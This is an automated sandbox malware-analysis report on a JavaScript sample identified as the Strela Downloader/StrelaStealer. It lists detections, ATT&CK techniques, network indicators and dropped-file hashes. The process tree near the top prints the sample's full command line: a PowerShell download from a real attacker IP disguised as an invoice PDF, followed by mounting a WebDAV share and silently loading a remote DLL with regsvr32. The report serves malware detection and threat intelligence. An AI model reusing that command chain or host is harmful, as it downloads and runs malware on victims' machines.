Windows
Analysis Report
2014717258213104107.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6412 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\20147 1725821310 4107.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2752 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\177 5158676486 .dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1804 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6628 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 5368 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 6484 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 24 --field -trial-han dle=1648,i ,180799134 3129609932 8,18621389 9883159177 5,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3160 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
14% | Virustotal | Browse | ||
11% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589060 |
Start date and time: | 2025-01-11 09:01:43 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 56s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2014717258213104107.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 162.159.61.3, 172.64.41.3, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 2.23.242.162, 23.209.209.135, 199.232.210.172, 2.16.168.105, 2.16.168.107, 23.200.0.21, 23.200.0.33, 192.168.2.6, 13.107.246.45, 54.224.241.105, 4.175.87.197, 104.77.220.172, 20.3.187.198, 4.245.163.56
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
03:02:40 | API Interceptor | |
03:02:44 | API Interceptor | |
03:02:44 | API Interceptor | |
03:02:51 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263003704218027 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0l:9JZj5MiKNnNhoxu4 |
MD5: | BECD065F86AF1813B308DC44C7FA3FBA |
SHA1: | BBB75BF2B7C04EEF24AE1302C3A0F965705834ED |
SHA-256: | 75F4418B60D2E5A9F8E9C641FF5FB9E75CCBAC3246C49247CB76828848309CEF |
SHA-512: | D7D602F0D455B4055C1895A4ADBA61FFA9D825828A08208EBA6202C366642DD09F6BBBCA2687C0EC057D3C82D34CC53656C8088EF78FAE53791530234C8A685D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.755571850096084 |
Encrypted: | false |
SSDEEP: | 1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL |
MD5: | A4C929E641E2E42CB89377616F62C283 |
SHA1: | 9B748390B50FAAC6C450194C2A3862E4F70B1AE6 |
SHA-256: | D6A7BD61896BD271ED005E07CA003EC2D3B0B763E7A872B27599F3182D1E277D |
SHA-512: | DCD8B6F2B4755078B677A4F39D53FB90ABF8A2A77A5967302D7B98C937FD6A13363B864B80996D7F4F1A9651CAE9B39A9F1D14AFFB0DEF088D3AE953AA406789 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.0791892111917624 |
Encrypted: | false |
SSDEEP: | 3:iztyYe+T3KuNaAPaU1l3+el1olluxmO+l/SNxOf:izUzxuNDPaUIgmOH |
MD5: | 60984FA57A9FE85044B80045695B4EF9 |
